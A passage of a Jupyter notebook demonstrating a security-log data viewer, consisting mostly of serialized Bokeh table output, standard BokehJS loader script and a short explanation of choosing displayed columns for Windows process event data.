",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362]},\"selected\":{\"id\":\"1319\"},\"selection_policy\":{\"id\":\"1320\"}},\"id\":\"1249\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1332\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1325\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1279\"},\"title\":\"TimeGenerated\",\"width\":50},\"id\":\"1280\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1319\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1323\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1331\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1330\"},\"title\":\"CommandLine\",\"width\":125},\"id\":\"1277\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1329\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1328\"},\"title\":\"NewProcessName\",\"width\":52},\"id\":\"1276\",\"type\":\"TableColumn\"}],\"root_ids\":[\"1271\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n var render_items = [{\"docid\":\"dd9cf645-1572-400f-9714-dd67b652feb7\",\"notebook_comms_target\":\"1334\",\"root_ids\":[\"1271\"],\"roots\":{\"1271\":\"b150951c-1d9c-43d4-b23b-0e0baa1e8441\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n var attempts = 0;\n var timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n clearInterval(timer);\n embed_document(root);\n } else {\n attempts++;\n if (attempts > 100) {\n clearInterval(timer);\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n }\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "1271" } }, "output_type": "display_data" }, { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "50d5ff5100bd40b4a05dc32b98c45991", "version_major": 2, "version_minor": 0 }, "text/plain": [ "Accordion(children=(VBox(children=(VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle…" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "columns = [\n", " \"Account\",\n", " \"EventID\",\n", " \"TimeGenerated\",\n", " \"Computer\",\n", " \"NewProcessName\",\n", " \"CommandLine\",\n", " \"ParentProcessName\",\n", "]\n", "DataViewer(data, selected_cols=columns)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Use \"Choose columns\" to select which columns to display\n", "\n", "The right side list contains the available columns in the DataFrame,\n", "the left side is the list of columns to display.\n", "\n", "Use the Add/Remove buttons to add or remove columns from the selected set.\n", "You can select multiple columns using Ctrl+Click or Shift+Click (the\n", "former selects or deselects an item for each click, the latter selects\n", "a range of items between the last item selected and the currently-clicked\n", "item).\n", "\n", "Click on Apply columns to update the data view." ] }, { "cell_type": "code", "execution_count": 4, "metadata": {}, "outputs": [ { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n var JS_MIME_TYPE = 'application/javascript';\n var HTML_MIME_TYPE = 'text/html';\n var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n var CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n var script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n var cell = handle.cell;\n\n var id = cell.output_area._bokeh_element_id;\n var server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd, {\n iopub: {\n output: function(msg) {\n var id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n var output_area = handle.output_area;\n var output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n return\n }\n\n var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n var bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n var script_attrs = bk_div.children[0].attributes;\n for (var i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n var toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) {\n var events = require('base/js/events');\n var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(null);\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error(url) {\n console.error(\"failed to load \" + url);\n }\n\n for (let i = 0; i < css_urls.length; i++) {\n const url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n for (let i = 0; i < js_urls.length; i++) {\n const url = js_urls[i];\n const element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.async = false;\n element.src = url;\n if (url in hashes) {\n element.crossOrigin = \"anonymous\";\n element.integrity = \"sha384-\" + hashes[url];\n }\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n var css_urls = [];\n \n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n var docs_json = {\"25caf126-b665-444e-a299-743f1ce3b751\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"auto_edit\":true,\"columns\":[{\"id\":\"1434\"},{\"id\":\"1435\"},{\"id\":\"1441\"},{\"id\":\"1436\"},{\"id\":\"1437\"},{\"id\":\"1438\"},{\"id\":\"1439\"}],\"editable\":true,\"height\":550,\"source\":{\"id\":\"1410\"},\"view\":{\"id\":\"1431\"},\"width_policy\":\"max\"},\"id\":\"1432\",\"type\":\"DataTable\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdm